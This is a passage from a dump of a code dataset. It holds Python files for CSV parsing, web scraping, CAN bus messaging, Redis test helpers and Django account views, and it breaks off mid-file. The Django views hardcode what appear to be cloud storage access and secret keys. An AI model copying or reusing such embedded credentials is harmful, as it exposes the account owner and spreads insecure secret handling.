if not county_getter:\n raise TypeError(f\"Choice {choice} did not match to a 
county parsing function\")\n\n    unsuccessful_counties_datapoints = {}\n    successful_counties_datapoints = []\n\n    count = 0\n    for row in csv.DictReader(file):\n        # read a row\n        (county, error) = county_getter(row)\n        # handle the results\n        if county is not None:\n            # if there is no value, do not specify a default here:\n            # leave it blank/None when creating the Data Point and let\n            # the model implementation handle defaults.\n            value_str = row.get('Value', None)\n            value = float(value_str) if value_str else None\n            # create and collect (but do not save!) the data point\n            data_point = Data_Point(county=county, data_set=data_set, value=value)\n            successful_counties_datapoints.append(data_point)\n        elif error is not None:\n            unsuccessful_counties_datapoints.update(error)\n        # increment a row counter\n        count += 1\n\n    return successful_counties_datapoints, unsuccessful_counties_datapoints\n","sub_path":"hda_privileged/upload_reading.py","file_name":"upload_reading.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"527502785","text":"import numpy as np\nfrom typing import List, Callable\n\n# A function that takes an np.ndarray as input and returns an np.ndarray\nArray_Function = Callable[[np.ndarray], np.ndarray]\n\n# A Chain is a list of functions.\nChain = List[Array_Function]\n\ndef deriv(func: Array_Function, input_: np.ndarray, delta: float = 0.001) -> np.ndarray:\n    '''\n    Numerical derivative of func at every point of input_ (central difference).\n    Defined here because chain_deriv_3 below relies on it.\n    '''\n    return (func(input_ + delta) - func(input_ - delta)) / (2 * delta)\n\ndef chain_deriv_3(chain: Chain, input_range: np.ndarray) -> np.ndarray:\n    '''\n    Uses the chain rule to compute the derivative of a composite of three functions\n    '''\n    \n    assert len(chain) == 3, \\\n    \"The argument chain must have length 3\"\n    \n    f1 = chain[0]\n    f2 = chain[1]\n    f3 = chain[2]\n    \n    # f1(x)\n    f1_of_x = f1(input_range)\n    \n    # f2(f1(x))\n    f2_of_x = f2(f1_of_x)\n    \n    # df3du\n    df3du = deriv(f3, f2_of_x)\n    \n    # df2du\n    df2du = deriv(f2, f1_of_x)\n    \n    # df1dx\n    df1dx = deriv(f1, input_range)\n    \n    # Multiply the values pointwise\n    return df1dx * df2du * df3du\n","sub_path":"chain_deriv_3.py","file_name":"chain_deriv_3.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"41830678","text":"import json\nimport time\n\nfrom selenium import webdriver\n\n\nclass SaveItem:\n    '''Holds the scraped data'''\n    def __init__(self):\n        self.data = {}\n\nclass DouyuSpider(object):\n    '''Scrapes the room listings'''\n    def __init__(self):\n        # define the start URL\n        self.start_url = 'https://www.douyu.com/directory/all'\n        # instantiate the driver object\n        self.driver = webdriver.Chrome()\n        self.save_item = SaveItem()\n\n    def get_content_list(self):\n        # collect the room entries\n        li_list = self.driver.find_elements_by_xpath('//ul[@id=\"live-list-contentbox\"]/li')\n        content_list = []\n        for li in li_list:\n            item = {}\n            item['room_img'] = li.find_element_by_xpath(\".//span[@class='imgbox']/img\").get_attribute(\"src\")\n            item['room_title'] = li.find_element_by_xpath(\"./a\").get_attribute('title')\n            item['room_cate'] = li.find_element_by_xpath(\".//span[@class='tag ellipsis']\").text\n            item['anchor_name'] = li.find_element_by_xpath(\".//span[@class='dy-name ellipsis fl']\").text\n            item['watch_num'] = li.find_element_by_xpath(\".//span[@class='dy-num fr']\").text\n            content_list.append(item)\n        next_url_list = self.driver.find_elements_by_xpath('//div[@id=\"J-pager\"]/a[@class=\"shark-pager-next\"]')\n        next_url = next_url_list[0] if len(next_url_list) > 0 else None\n        return content_list, next_url\n\n    def run(self):  # main logic\n        # request the start URL\n        self.driver.get(self.start_url)\n\n        # close the prompt popup; comment this out if there is no popup\n        # self.driver.find_element_by_class_name('pop-zoom-hide').click()\n        # time.sleep(1)\n\n        # extract the data and the next-page element\n        content_list, next_url = self.get_content_list()\n\n        # save the data\n        
count = 1\n        self.save_item.data[count] = content_list\n\n        # click the next-page element in a loop\n        while next_url is not None:\n            print(count)\n            next_url.click()\n            time.sleep(2)\n            content_list, next_url = self.get_content_list()\n            count += 1\n            self.save_item.data[count] = content_list\n        self.driver.close()\n        with open('douyu02018_12_17.json', 'w', encoding='utf-8') as fp:\n            json.dump(self.save_item.data, fp, ensure_ascii=False, indent=4)\n\nif __name__ == '__main__':\n    douyu = DouyuSpider()\n    douyu.run()\n    print('ok')","sub_path":"douyu_spider.py","file_name":"douyu_spider.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"246732186","text":"\"\"\"Resolwe entity serializer.\"\"\"\nfrom resolwe.flow.models import Collection, Entity\n\nfrom .collection import BaseCollectionSerializer\nfrom .fields import DictRelatedField\n\n\nclass EntitySerializer(BaseCollectionSerializer):\n    \"\"\"Serializer for Entity.\"\"\"\n\n    collection = DictRelatedField(\n        queryset=Collection.objects.all(),\n        serializer=BaseCollectionSerializer,\n        allow_null=True,\n        required=False,\n        write_permission=\"edit\",\n    )\n\n    class Meta(BaseCollectionSerializer.Meta):\n        \"\"\"EntitySerializer Meta options.\"\"\"\n\n        model = Entity\n        fields = BaseCollectionSerializer.Meta.fields + (\n            \"collection\",\n            \"duplicated\",\n            \"type\",\n        )\n\n    def update(self, instance, validated_data):\n        \"\"\"Update.\"\"\"\n        source_collection = instance.collection\n        instance = super().update(instance, validated_data)\n        instance.move_to_collection(source_collection, instance.collection)\n\n        return instance\n","sub_path":"resolwe/flow/serializers/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"149807447","text":"import sys\nsys.stdin = open('파핑1.txt','r')\ndef p(board):\n    for b in board:\n        print(b)\n    print('')\n\n\ndef mine(arr,N):\n    global di, dj\n    for i in range(N):\n        for j in range(N):\n            if arr[i][j] == -1:  # if this cell is a mine\n                for k in range(8):\n                    ni = i + di[k]\n                    nj = j + dj[k]\n                    if 0<=ni0:\n                cnt += 1\n    print('#{} {}'.format(tc,cnt))","sub_path":"1113/파핑답.py","file_name":"파핑답.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"103805066","text":"#!/usr/bin/env python\n'''\nCreated on 29.09.2020\n\n@author: Marcel Gruber\n\nThis script receives, sends and stores data sent by a connected microcontroller. 
\nAll parameters can be set by flags or in the attached config.py file.\nIf you choose to use flags, they are used instead of the configuration.\n'''\nimport can\nfrom can.bus import BusState\n\nimport config\nimport os\nimport argparse, sys\nfrom datetime import datetime\nimport time\nimport threading\n\ncan_bustype = 'vector'\nappname = 'CANalyzer'\ncan_channel = 1\ncan_bitrate = 500000\nfilename = 'data_logger'\ninterface = True\n\n\n\ndef receive_all():\n    # Receives all messages and prints them to the console until Ctrl+C is pressed.\n\n    with can.interface.Bus(\n        bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000\n    ) as bus:\n        # set to read-only, only supported on some interfaces\n        #bus.state = BusState.PASSIVE\n\n        try:\n            while True:\n                msg = bus.recv(1)\n                if msg is not None:\n                    print(msg)\n                if stop_threads:\n                    break\n\n        except KeyboardInterrupt:\n            pass  # exit normally\n\ndef convert_message():\n    # Convert all messages\n    pass\n\ndef send_one(can_command):\n    # Sends a single message.\n\n    # this uses the default configuration (for example from the config file)\n    # see https://python-can.readthedocs.io/en/stable/configuration.html\n    with can.interface.Bus(\n        bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000\n    ) as bus:\n\n        # Using specific buses works similarly:\n        # bus = can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000)\n        # bus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=250000)\n        # bus = can.interface.Bus(bustype='ixxat', channel=0, bitrate=250000)\n        # bus = can.interface.Bus(bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000)\n\n        msg = can.Message(\n            arbitration_id=0x10, data=[can_command, 25, 0, 1, 3, 1, 4, 1], is_extended_id=False\n        )\n\n        try:\n            bus.send(msg)\n            print(\"Message sent on \" + bus.channel_info)\n            print(\"Command: \" + str(msg))\n        except can.CanError:\n            print(\"Message NOT sent\")\n\ndef send_status():\n    # Identifier 10\n    # DLC 1\n    # Data 7 (Command) 0\n    pass\ndef config_interface(can_bustype, appname, can_channel, can_bitrate, filename, interface,):\n    # Dialog to configure the CAN bus\n    print(\"Config CAN BUS\")\n    print(\"##################\")\n    can_bustype = input(\"Bustype:\") or can_bustype\n    appname = input(\"Only Vector Hardware needed Appname:\") or appname  #\"ivas_\"+time.strftime(\"%Y_%m_%d-%H_%M_%S\")\n    # the values typed in come back as strings; the Bus constructor needs ints\n    can_channel = int(input(\"Channel 0 or 1: \") or can_channel)\n    can_bitrate = int(input(\"Bitrate of CAN: \") or can_bitrate)\n    filename = input(\"Filename to save the data: \") or filename\n    print(\"###########################################\")\n    print(\"#INFO######################################\")\n    print(\"Interface Bus: Bustype=\"+str(can_bustype)+\", AppName= \"+appname+\", Channel= \"+str(can_channel)+\", Bitrate= \"+str(can_bitrate))\n    print(\"Filename :\"+filename+\".txt\")\n    print(\"###########################################\")\n\n    return can_bustype, appname, can_channel, can_bitrate, filename, interface\n\n\ndef logging(can_bustype, appname, can_channel, can_bitrate, filename, interface):\n    pass\n\ndef interact(can_bustype, appname, can_channel, can_bitrate, filename, interface):\n    # Dialog to start the script\n    if interface:\n        can_bustype, appname, can_channel, can_bitrate, filename, interface = config_interface(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n\n    with can.interface.Bus(\n        bustype=can_bustype,\n        app_name=appname,\n        channel=can_channel,\n        bitrate=can_bitrate\n    ) as bus:\n\n        # Using specific buses works similarly:\n        # bus = 
can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000)\n        # bus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=250000)\n        # bus = can.interface.Bus(bustype='ixxat', channel=0, bitrate=250000)\n        # bus = can.interface.Bus(bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000)\n\n        msg = can.Message(\n            arbitration_id=0x10, data=[4, 25, 0, 1, 3, 1, 4, 1], is_extended_id=False\n        )\n\n        try:\n            bus.send(msg)\n            print(\"Message sent on \" + bus.channel_info)\n            print(\"Command: \" + str(msg))\n        except can.CanError:\n            print(\"Message NOT sent\")\n\n\nif __name__ == \"__main__\":\n    stop_threads = False\n    t1 = threading.Thread(target=receive_all)\n    # pass the callable plus its arguments; calling interact(...) here would\n    # run it immediately in the main thread instead of in the new thread\n    t2 = threading.Thread(target=interact, args=(can_bustype, appname, can_channel, can_bitrate, filename, interface))\n    t1.start()\n    t2.start()\n\n    q = ''\n    while q != 'q':\n        print(\"###\")\n        q = input()\n\n    stop_threads = True\n    t1.join()\n\n    print('finish')\n\n\n\n    '''\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--mode\", help=\"Decide between Interact or logging\", default=\"interact\")\n    parser.add_argument(\"--bustype\", help=\"Type of Bus\", default='vector')\n    parser.add_argument(\"--app_name\", help=\"Needed only with Vector Hardware\", default=\"CANalyzer\")\n    parser.add_argument(\"--channel\", help=\"Channel 0 or 1\", type=int, default=1)\n    parser.add_argument(\"--bitrate\", help=\"Baudrate of CAN\", type=int, default=500000)\n    parser.add_argument(\"--display\", action='store_true', required=False)\n\n    parser.add_argument(\"--filename\", help=\"Filename to store the data\")\n    parser.add_argument(\"--interface\", action=\"store_true\", help=\"enables user-friendly interface for parameter input\")\n\n    args = parser.parse_args()\n\n    mode = args.mode if args.mode else config.mode\n\n    if mode == 'interact':\n        can_bustype = args.bustype if args.bustype else config.bustype\n        appname = args.app_name if args.app_name else config.app_name\n        can_channel = args.channel if args.channel else config.channel\n        can_bitrate = args.bitrate if args.bitrate else config.bitrate\n        filename = args.filename if args.filename else config.filename\n        interface = args.interface if args.interface else config.interface\n\n        interact(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n\n    if mode == 'logging':\n        can_bustype = args.bustype if args.bustype else config.bustype\n        appname = args.app_name if args.app_name else config.app_name\n        can_channel = args.channel if args.channel else config.channel\n        can_bitrate = args.bitrate if args.bitrate else config.bitrate\n        filename = args.filename if args.filename else config.filename\n        interface = args.interface if args.interface else config.interface\n\n        interact(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n'''\n\n\"\"\"\n    except OSError as e:  # FileExistsError:\n        logging.error(\"Could not create database (file exists?)\")\n        logging.debug(e)\n    except KeyboardInterrupt:\n        logging.info(\"Got keyboard interrupt\")\n        #logging.info(\"stored data in: \" + file + ', ' + csv_path + ', ' + csv_path.replace('.csv', '_high_acc.csv') )\n    \"\"\"","sub_path":"can_data.py","file_name":"can_data.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"134957994","text":"# -*- coding:utf-8 -*-\nfrom base.base_redis import BaseRedis\nimport datetime\nimport json\nimport settings\n\nclass Redis(BaseRedis):\n\n    def get_image_captcha(self, device_id):\n        # fetch the image captcha\n        
redis_value = self.get(\"LOGIN_CODE_{0}\".format(device_id))\n        return redis_value\n\n    def delete_image_captcha(self, device_id):\n        # delete the image captcha\n        self.delete(\"LOGIN_CODE_{0}\".format(device_id))\n\n    def clean_user_bean(self,user_id):\n        # clear the user's bean (in-app currency) balance\n        self.delete(key='REDIS##BEAN##{0}'.format(user_id))\n\n    def clean_user_buy_guard(self, user_id, anchor_id):\n        # clear the user's guard purchase info\n        self.delete(key='ROOM_USER_GUARD_FROM_ANCHOR_{0}'.format(anchor_id))\n        self.hdel(name='ROOM_USER_GUARD_LIST', key='{0}_{1}'.format(anchor_id, user_id))\n        self.hdel(name='ROOM_USER_GUARD_INFO_LIST', key=anchor_id)\n        self.delete(key='I_GUARD_ANCHORS_REDIS_{0}'.format(user_id))\n\n    def clean_black_user(self, anchor_id):\n        # clear the blacklist\n        self.hdel(name='YL_ROOM_BLACK_USER', key=anchor_id)\n\n    def clean_red_packet(self, room_id, red_packet_id):\n        # clear red packet info\n        self.delete(key='ACT_RED_PACKET_REDIS_REDPACKET_{0}_{1}'.format(room_id, red_packet_id))\n        self.delete(key='ACT_RED_PACKET_REDIS__GET_LIST_{0}_{1}'.format(room_id, red_packet_id))\n        self.delete(key='ACT_RED_PACKET_REDIS_{0}'.format(room_id))\n        self.hdel(name='ACT_RED_PACKET_REDIS__LIST_', key=room_id)\n\n    def clean_anchor_group(self, user_id, anchor_id):\n        # clear anchor group info\n        self.hdel(name='ANCHOR_GROUP_KEY', key=user_id)\n        self.hdel(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id)\n        self.srem('ANCHOR_GROUP_KEY_{0}'.format(user_id), '{0}'.format(anchor_id))\n\n    def clean_user_plat_signin(self, user_id):\n        # clear the platform sign-in record\n        self.hdel(name='PLAT_SIGN_IN_USER', key=user_id)\n\n    def clean_check_mobile_code(self, user_id):\n        # clear the user's mobile-binding flag\n        self.delete(key='check_moble_code_{0}'.format(user_id))\n\n    def clean_user_task(self, user_id):\n        # clear the user's task info\n        self.delete(key='YL_USER_DAILY_TASK_REDIS_{0}_{1}'.format(user_id, datetime.datetime.now().strftime(\"%Y%m%d\")))\n        self.hdel(name='YL_USER_ONCE_TASK_REDIS_bind_mobile', key=user_id)\n\n    def set_anchor_group_anchor_end_time(self, anchor_id, end_time):\n        # update the anchor's expiry time within the anchor group\n        details = self.hget(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id)\n        details_dic = json.loads(details)\n        details_dic['end_time'] = int(end_time)\n        self.hset(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id,content=json.dumps(details_dic))\n\n    def set_red_packet_end_time(self, room_id, red_packet_id, end_time):\n        # update the red packet's expiry time\n        details = self.hget(name='ACT_RED_PACKET_REDIS_{0}'.format(room_id),key='DATA_{0}'.format(red_packet_id))\n        details_dic = json.loads(details)\n        details_dic['end_time'] = int(end_time)\n        self.hset(name='ACT_RED_PACKET_REDIS_{0}'.format(room_id),key='DATA_{0}'.format(red_packet_id), content=json.dumps(details_dic))\n\n    def set_user_plat_signin_day(self,user_id, day_num):\n        # update the platform sign-in day count\n        details = self.hget(name='PLAT_SIGN_IN_USER', key=user_id)\n        details_dic = json.loads(details)\n        details_dic['signin_next_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        details_dic['signin_last_date'] = (datetime.datetime.now() + datetime.timedelta(days=-1)).strftime(\"%Y-%m-%d\")\n        details_dic['signin_series_num'] = int(day_num)\n        self.hset(name='PLAT_SIGN_IN_USER', key=user_id, content=json.dumps(details_dic))\n\n    def check_anchor_dynamic(self,dynamic_id, status=1):\n        # simulate reviewing/approving an anchor's feed post\n        details = self.hget(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id)\n        details_dic = json.loads(details)\n        details_dic['status'] = status\n        self.hset( name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id, content=json.dumps(details_dic))\n        score = format(float(1) / float(dynamic_id), '.16f')\n        self.zadd('USER_DYNAMIC_REDIS_SQUARE', score, dynamic_id)\n\n    def fix_dynamic_created_time(self,dynamic_id, 
created_time):\n        # update the post's creation time\n        details = self.hget(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id)\n        details_dic = json.loads(details)\n        details_dic['create_time'] = created_time\n        self.hset(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id, content=json.dumps(details_dic))\n\n    def clean_doll_log(self,user_id,doll_log_id=8888):\n        self.hdel(name='doll_log_status', key=doll_log_id)\n        self.hdel(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA', key=doll_log_id)\n        self.delete('DOLL_MACHINE_USER_LOG_LIST_{0}'.format(user_id))\n\n    def add_doll_log(self,user_id, room_id, start_time, end_time, doll_log_id=8888):\n        self.hset(name='doll_log_status', key=doll_log_id, content='1')\n        self.rpush('DOLL_MACHINE_USER_LOG_LIST_{0}'.format(user_id), doll_log_id)\n        details = {\n            \"id\": doll_log_id,\n            \"user_id\": user_id,\n            \"machine_id\": 1,\n            \"room_id\": room_id,\n            \"doll_id\": 1,\n            \"end_time\": end_time,\n            \"start_time\": start_time,\n            \"status\": 1,\n            \"post_time\": None,\n            \"name\": None,\n            \"mobilephone\": None,\n            \"area\": None,\n            \"address\": None,\n            \"post_id\": None,\n            \"post_company\": None,\n            \"remarks\": \"\",\n            \"operator\": None,\n            \"postage\": None,\n            \"doll_num\": 1,\n            \"apply_time\": None,\n            \"order_id\": \"20158692_15110173654985469265879\"\n        }\n        self.hset(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA', key=doll_log_id,content=json.dumps(details))\n\n    def doll_fake_consignment(self,doll_id,post_id,post_company):\n        details = self.hget(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA',key=doll_id)\n        details_dic = json.loads(details)\n        details_dic['status'] = 4\n        details_dic['post_id'] = post_id\n        details_dic['post_company'] = post_company\n        self.hset(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA',key=doll_id,content=json.dumps(details_dic))\n\n    def clean_quiz_questions(self,room_id,question_ids):\n        self.hdel('JC_ROOM_INNINGS',key=room_id)\n        self.delete('JC_QUESTION_IDS_1_{0}'.format(room_id))\n        self.delete('JC_QUESTION_IDS_2_{0}'.format(room_id))\n        for x in question_ids:\n            self.delete('JC_QUESTION_{0}'.format(x))\n            self.delete('JC_AMOUNT_{0}'.format(x))\n\n\nclass RedisHold(BaseRedis):\n    redis_host = settings.HOLD_REDIS_CONFIG['host']\n    redis_port = settings.HOLD_REDIS_CONFIG['port']\n\n\n    def clean_redis_user_detail(self, user_id):\n        # clear user info\n        self.delete(key='CACHED_USER_PROPERTIES_{0}'.format(user_id))\n        self.hdel(name='USERID', key=user_id)\n        Redis().clean_user_bean(user_id)\n\n    def clean_redis_room_detail(self, room_id, anchor_id):\n        # clear room info\n        self.hdel(name='ROOM', key=room_id)\n        self.hdel(name='ANCHOR_ROOM', key=anchor_id)\n        self.delete(key='RANK_ANCHOR_COST_{0}'.format(anchor_id))\n\n    def add_user_package_gift(self,user_id, gift_id, gift_num):\n        # add a gift to the user's backpack\n        self.hset(name='CACHED_USER_PROPERTIES_{0}'.format(user_id), key='package_{0}'.format(gift_id), content=gift_num)\n","sub_path":"utilities/redis_helper.py","file_name":"redis_helper.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"548175646","text":"import sys\r\n\r\n\r\n\r\ndef _fix_date(periodo, fecha):\r\n    rt = 0\r\n\r\n    if len(periodo) != 6 or len(fecha) == 0:\r\n        print(f\"el periodo: {periodo} o la fecha: {fecha}, error!\")\r\n        sys.exit(0)\r\n\r\n    year = periodo[:4]\r\n    month = periodo[4:]\r\n\r\n    if \"-\" in fecha:\r\n        spl_fc = fecha.split(\"-\")\r\n        if len(spl_fc) == 3:\r\n\r\n            fc_y = spl_fc[0]\r\n            fc_m = spl_fc[1]\r\n            fc_d = spl_fc[2]\r\n\r\n            rt = f\"{year}-{month}-{fc_d}\"\r\n        else:\r\n            print(f\" fecha: {fecha}, formato invalido\")\r\n            
sys.exit(0)\r\n else:\r\n print(f\" fecha: {fecha}, formato invalido\")\r\n sys.exit(0)\r\n return rt\r\n\r\ndef main():\r\n periodo = \"201907\"\r\n fecha = \"2555-22-11\"\r\n print(_fix_date(periodo, fecha))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"235942280","text":"# -*- coding: utf-8 -*-\nimport re\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import transaction\nfrom django.utils.decorators import method_decorator\nfrom qiniu import Auth\nfrom rest_framework import viewsets\nfrom authtoken.authentication import TokenAuthentication\nfrom rest_framework.decorators import api_view, detail_route\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom authtoken.models import Token\nfrom rest_framework.decorators import authentication_classes, permission_classes\nfrom dynamic_rest.viewsets import WithDynamicViewSetMixin, DynamicModelViewSet\nfrom common import appcodes\nfrom pay.models import PointPay\nfrom chaolife.exceptions import UserCheck\nfrom account.models import User, PartnerMember, CustomerMember, BillHistory\nfrom account.models import Installation\nfrom account.serializers import CustomerUserSerializer, UpdateMemberSerializer, BillHistorySerializer, \\\n PartnerUserSerializer\nfrom chaolife.serializers import InstallationSerializer\nfrom chaolife.tasks import notify_user, createRoomDaysetsFormRoomPackage, checkHousePackageState\nfrom common.utils.AppJsonResponse import DefaultJsonResponse\nfrom common.decorators import method_route, parameter_necessary, is_authenticated\nfrom chaolife.exceptions import PermissionDenied\nfrom common import exceptions\nfrom sms import config as smsConfig\nfrom sms.client import RegisterSmsRequest, GetLoginSmsRequest, VertifySmsRequest\nfrom account.service import RegisterSmsChecker, LoginSmsChecker, VertifySmsChecker\nfrom sms.models import SmsRecord\nfrom ..utils.appletest import isTestAccount\nfrom ..service import vertifySmsCode\nfrom common import R\nfrom common.R import METHOD\nimport base64\naccess_key = 'u-ryAwaQeBx9BS5t8OMSPs6P1Ewoqiu6-ZbbMNYm'\nsecret_key = 'hVXFHO8GusQduMqLeYXZx_C5_c7D-VSwz6AKhjZJ'\n\n\nclass UserViewSet(WithDynamicViewSetMixin, UpdateModelMixin, viewsets.GenericViewSet):\n serializer_class = CustomerUserSerializer\n queryset = User.objects.all()\n\n @method_route(methods=['POST', 'GET'], url_path='sms/register', )\n @method_decorator(parameter_necessary('phone_number', ))\n def get_register_sms(self, request, phone_number, *args, **kwargs):\n sms_request = RegisterSmsRequest(phone_number=phone_number)\n sms_request.perform_request()\n sms_record = sms_request.get_smsRecord()\n return DefaultJsonResponse(message=R.String.VERTIFY_SMS_SENT, data={'business_id': sms_record.business_id})\n\n @method_route(methods=['POST', ], url_path='register')\n @transaction.atomic()\n @method_decorator(parameter_necessary('phone_number', 'smsCode', 'business_id', ))\n def register(self, request, *args, **kwargs):\n phone_number = request.POST.get('phone_number')\n\n if User.existPhoneNumber(phone_number, raise_exception=False):\n return DefaultJsonResponse(code=appcodes.CODE_PHONE_IS_EXIST, message=R.String.PHONE_EXISTED)\n\n if (isTestAccount(phone_number) or vertifySmsCode(request, 
SmsRecord.BUSINESS_TYPE_REGISTE)):\n            try:\n                # TODO: test-only branch\n                if request.POST.get('test', None):\n                    user = User.objects.create(phone_number=phone_number)\n                    user.role = user.HOTEL_PARTNER\n                    user.save()\n                    PartnerMember.objects.create(user=user)\n                    from chaolife.serializers.user import UserSerializer\n                    serializer = UserSerializer(user)\n                else:\n                    member = CustomerMember.objects.create(phone_number)\n                    user = member.user\n                    serializer = CustomerUserSerializer(user, )\n                # end\n                token = Token.create_for_mobile_client(user, request.client_type)\n                # WARN: test code\n                inviter = request.POST.get('inviter')\n                print('inviter is {}'.format(inviter))\n                if inviter:\n                    from account.invitation.service import invited_service\n                    invited_service(inviter, user)\n                user.save()\n                user_data = {'user': serializer.data}\n            except BaseException:\n                raise\n            else:\n                # nothing went wrong\n                response = DefaultJsonResponse(data=user_data, code=appcodes.CODE_100_OK,\n                                               message=R.String.REGISTER_SUCCESS)\n                response['token'] = token\n                return response\n        else:\n            return DefaultJsonResponse(code=appcodes.CODE_SMS_ERROR, message=R.String.REGISTER_SMS_VERTIFY_FAILED)\n\n    @method_route(methods=['POST', 'GET'], url_path='sms/login')\n    @method_decorator(parameter_necessary('phone_number', ))\n    def get_login_sms(self, request, phone_number, *args, **kwargs):\n        User.existPhoneNumber(phone_number)\n        sms_request = GetLoginSmsRequest(phone_number=phone_number)\n        sms_request.perform_request()\n        sms_record = sms_request.get_smsRecord()\n        return DefaultJsonResponse(message=R.String.SMS_SEND, data={'business_id': sms_record.business_id})\n\n    @method_route(methods=['POST', 'GET'], url_path='sms/reset-pay-pwd', permission_classes=(IsAuthenticated,))\n    def get_reset_pay_pwd_sms(self, request, *args, **kwargs):\n        sms_request = VertifySmsRequest(phone_number=request.user.phone_number,\n                                        template_code=smsConfig.template_reset_pay_pwd_code)\n        sms_request.perform_request()\n        sms_record = sms_request.get_smsRecord()\n        return DefaultJsonResponse(message=R.String.SMS_SEND, data={'business_id': sms_record.business_id})\n\n    @method_route(methods=['POST', ], url_path='reset-pay-pwd', permission_classes=(IsAuthenticated,))\n    @method_decorator(parameter_necessary('pay_pwd', ))\n    def reset_pay_pwd(self, request, pay_pwd, ):\n        vertifySmsCode(request, SmsRecord.BUSINESS_TYPE_RESET_PAY_PWD)\n        request.user.set_pay_pwd(pay_pwd)\n        return DefaultJsonResponse(message=R.String.MODIFY_PAY_PWD_SUCCESS)\n\n    @method_route(methods=['POST', ], url_path='login')\n    @method_decorator(parameter_necessary('phone_number', 'smsCode', 'business_id'))\n    def login(self, request, *args, **kwargs):\n        # from common import fixutils\n        # from order.tasks import check_expired_order,check_should_tag_checkout_order,check_should_checkin_order,order_point_to_seller_account\n        phone_number = request.POST.get('phone_number')\n        try:\n            user = User.objects.get(phone_number=phone_number)\n            if (isTestAccount(phone_number) or vertifySmsCode(request, SmsRecord.BUSINESS_TYPE_LOGIN)):\n                from authtoken.models import Token\n                token = Token.create_for_mobile_client(user=user, client_type=request.client_type)\n                response = DefaultJsonResponse(data={'user': self._get_serialize_data(request, user)})\n                response['token'] = token.key\n                return response\n            else:\n                return DefaultJsonResponse(message=R.String.VERTIFY_FAILED, code=appcodes.CODE_USER_AUTHENTICATE_FAIL)\n        except User.DoesNotExist:\n            return DefaultJsonResponse(message=R.String.VERTIFY_FAILED, code=appcodes.CODE_USER_NOT_EXIST)\n\n    @method_route(methods=['GET'], 
permission_classes=(IsAuthenticated,))\n    def logout(self, request, *args, **kwargs):\n        print(request.user)\n        if (isinstance(request.user, AnonymousUser)):\n            return Response('都没登入过叫个锤子啊')\n        else:\n            return DefaultJsonResponse(code=100, message=\"退出成功\")\n\n    @method_route(methods=['POST', ], url_path='password', permission_classes=(IsAuthenticated,))\n    @method_decorator(parameter_necessary('phone_number', 'password', 'newPassword'))\n    def change_password(self, request, *args, **kwargs):\n        phone_number = request.POST['phone_number']\n        password = request.POST['password']\n        new_password = request.POST['newPassword']\n        UserCheck.validate_pwd(password)\n        try:\n            user = User.objects.get(phone_number=phone_number)\n            if (user.check_password(password)):\n                user.set_password(new_password)\n                user.save()\n                return DefaultJsonResponse(message=R.String.MODIFY_SUCCESS)\n            else:\n                return DefaultJsonResponse(message=R.String.MODIFY_PAY_PWD_FAILED,\n                                           code=appcodes.CODE_USER_AUTHENTICATE_FAIL)\n        except User.DoesNotExist:\n            raise PermissionDenied()  # WARN: possibly an illegal probe\n\n    @method_route(methods=['PUT', 'POST'], url_path='profile/update', permission_classes=(IsAuthenticated,))\n    @method_decorator(is_authenticated())\n    def update_profile(self, request, *args, **kwargs):\n        if (request.method == 'GET'):\n            return self.get_profile(request, *args, **kwargs)\n        s = UpdateMemberSerializer(data=request.data)\n        if (s.is_valid()):\n            instance = s.update(request.user, s.validated_data, )\n            return DefaultJsonResponse(message=R.String.MODIFY_SUCCESS,\n                                       data={'user': CustomerUserSerializer(instance).data})\n        else:\n            return DefaultJsonResponse(message='修改失败{0}'.format(s.errors.values), code='-100')\n\n    @method_route(methods=['POST'], url_path='installation')\n    def installationId_register(self, request, *args, **kwargs):\n        data = request.data\n        serializer = InstallationSerializer(data=data)\n        if serializer.is_valid():\n            serializer.save()\n            return 